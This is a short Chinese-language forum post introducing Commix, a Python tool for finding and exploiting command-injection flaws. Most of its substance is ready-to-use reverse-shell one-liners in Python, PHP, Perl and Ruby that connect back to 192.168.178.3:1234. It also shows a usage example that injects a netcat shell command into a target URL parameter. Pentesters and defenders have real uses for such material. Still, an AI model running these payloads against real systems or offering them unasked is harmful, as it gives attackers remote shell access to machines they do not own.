搜索
查看: 1080|回复: 0

Commix – 自动化命令注入测试与利用工具

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2016-1-20 16:00:46 | 显示全部楼层 |阅读模式

项目首页:


https://github.com/stasinopoulos/commix

项目简介:


Commix是一个使用Python开发的漏洞测试工具,这个工具是为了方便的检测一个请求是否存在命令注入漏洞,并且对其进行测试,在其作者发布的最新版本中支持直接直接导入burp的历史记录进行检测,大大提高了易用性。
在作者所写的使用案例中还附送了一些反弹shell的技巧,如下:

1. Python-reverse-shell:
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\”192.168.178.3\”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\”/bin/sh\”,\”-i\”]);’
2. PHP-reverse-shell:
php -r ‘\$sock=fsockopen(\”192.168.178.3\”,1234);exec(\”/bin/sh -i <%263 >%263 2>%263\”);’
3. Perl-reverse-shell:
perl -e ‘use Socket;\$i=\”192.168.178.3\”;\$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\”tcp\”));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\”>%26S\”);open(STDOUT,\”>%26S\”);open(STDERR,\”>%26S\”);exec(\”/bin/sh -i\”);};’
4. Ruby-reverse-shell:
ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(\”192.168.178.3\”,1234);while(cmd=c.gets);IO.popen(cmd,\”r\”){|io|c.print io.read}end’

使用方法:



root@kali:~/commix# python commix.py –url=”http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE” –os-cmd=”nc -e /bin/sh 192.168.178.3 1234″
对于具体的测试方法与利用模块的开发可以去其github进行阅读。

[url=http://tools.pwn.ren/wp-content/uploads/2016/01/image.jpeg][/url]


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表